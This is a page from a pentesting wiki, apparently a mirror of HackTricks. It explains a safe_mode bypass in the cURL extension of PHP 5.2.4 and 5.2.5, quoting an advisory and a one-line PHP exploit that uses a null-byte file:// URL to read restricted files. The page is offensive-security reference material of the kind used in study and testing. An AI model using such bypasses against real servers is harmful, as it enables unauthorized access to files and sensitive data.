coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
aaa762d1b5
hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md
CPol 7c8dfb28dc
GitBook: [master] 17 pages modified
2020-11-14 18:21:56 +00:00

19 lines
624 B
Markdown
Raw Blame History

# disable\_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
## PHP 5.2.4 and 5.2.5 PHP cURL
From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
```text
source: http://www.securityfocus.com/bid/27413/info
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
The issue affects PHP 5.2.5 and 5.2.4.
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
```
Reference in New Issue View Git Blame Copy Permalink